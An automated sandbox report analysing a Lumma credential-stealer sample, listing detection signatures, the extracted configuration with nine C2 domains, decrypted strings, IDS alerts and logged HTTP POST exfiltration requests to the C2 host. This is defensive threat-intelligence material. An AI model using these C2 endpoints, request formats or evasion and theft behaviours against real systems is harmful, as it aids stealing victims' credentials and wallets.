Edit tour

Windows Analysis Report
random.exe.10.exe

Overview

General Information

Sample name:	random.exe.10.exe
Analysis ID:	1577461
MD5:	afd936e441bf5cbdb858e96833cc6ed3
SHA1:	3491edd8c7caf9ae169e21fb58bccd29d95aefef
SHA256:	c6491d7a6d70c7c51baca7436464667b4894e4989fa7c5e05068dde4699e1cbf
Tags:	bulletproofexeuser-abus3reports
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

random.exe.10.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\random.exe.10.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)

conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

random.exe.10.exe (PID: 7908 cmdline: "C:\Users\user\Desktop\random.exe.10.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["aspecteirs.lat", "discokeyus.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "pancakedipyps.click", "energyaffai.lat"], "Build id": "FATE99--test"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.1611561835.0000000000E04000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1611809499.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: random.exe.10.exe PID: 7908	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: random.exe.10.exe PID: 7908	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: random.exe.10.exe PID: 7908	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:47.532709+0100	2028371	3	Unknown Traffic	192.168.2.9	49712	104.21.23.76	443	TCP
2024-12-18T13:49:49.654760+0100	2028371	3	Unknown Traffic	192.168.2.9	49713	104.21.23.76	443	TCP
2024-12-18T13:49:52.808637+0100	2028371	3	Unknown Traffic	192.168.2.9	49714	104.21.23.76	443	TCP
2024-12-18T13:49:55.191760+0100	2028371	3	Unknown Traffic	192.168.2.9	49715	104.21.23.76	443	TCP
2024-12-18T13:49:57.766463+0100	2028371	3	Unknown Traffic	192.168.2.9	49716	104.21.23.76	443	TCP
2024-12-18T13:50:00.723890+0100	2028371	3	Unknown Traffic	192.168.2.9	49719	104.21.23.76	443	TCP
2024-12-18T13:50:03.335163+0100	2028371	3	Unknown Traffic	192.168.2.9	49721	104.21.23.76	443	TCP
2024-12-18T13:50:09.275190+0100	2028371	3	Unknown Traffic	192.168.2.9	49723	104.21.23.76	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:48.399248+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49712	104.21.23.76	443	TCP
2024-12-18T13:49:50.616047+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49713	104.21.23.76	443	TCP
2024-12-18T13:50:11.969055+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49723	104.21.23.76	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:48.399248+0100	2049836	1	A Network Trojan was detected	192.168.2.9	49712	104.21.23.76	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:49:50.616047+0100	2049812	1	A Network Trojan was detected	192.168.2.9	49713	104.21.23.76	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:50:01.494584+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	49719	104.21.23.76	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["aspecteirs.lat", "discokeyus.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "pancakedipyps.click", "energyaffai.lat"], "Build id": "FATE99--test"}

Multi AV Scanner detection for submitted file

Source: random.exe.10.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.4% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: pancakedipyps.click
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.1738236102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: FATE99--test

Source: random.exe.10.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49723 version: TLS 1.2

Source: random.exe.10.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\random.exe.10.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00EA36A9 FindFirstFileExW,		0_2_00EA36A9
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00EA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_00EA375A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49713 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49713 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49712 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49712 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49719 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49723 -> 104.21.23.76:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: pancakedipyps.click
Source: Malware configuration extractor	URLs: energyaffai.lat

Source: Joe Sandbox View

IP Address: 104.21.23.76 104.21.23.76

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49716 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49713 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49714 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49715 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49719 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49721 -> 104.21.23.76:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EKLZN1L1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12784Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RLMLEXFN40IEXJDRLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15056Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FI5E5W32HIHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20536Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VOGS9FMXKWB6KHV3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SGY5F9G8KXVCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 547865Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: pancakedipyps.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: pancakedipyps.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click

Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: random.exe.10.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: random.exe.10.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: random.exe.10.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: random.exe.10.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: random.exe.10.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: random.exe.10.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: random.exe.10.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: random.exe.10.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: random.exe.10.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: random.exe.10.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: random.exe.10.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: random.exe.10.exe, random.exe.10.exe, 00000003.00000003.1556346819.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1697099979.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1738037021.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580204789.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1581457141.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580105512.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1557069609.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580349074.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738879819.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651202964.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651102094.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737376014.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1612223125.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1556181740.0000000003707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/
Source: random.exe.10.exe, 00000003.00000003.1555532464.0000000003707000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1555702012.0000000003707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/X
Source: random.exe.10.exe, 00000003.00000003.1611667001.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580204789.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1581457141.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738812681.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1611774091.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1634305646.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1611863813.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737890040.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1611755617.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/api
Source: random.exe.10.exe, 00000003.00000003.1578903064.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1579093508.000000000370F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apiF
Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/api
Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/apiV
Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/apihs
Source: random.exe.10.exe	String found in binary or memory: https://sectigo.com/CPS0
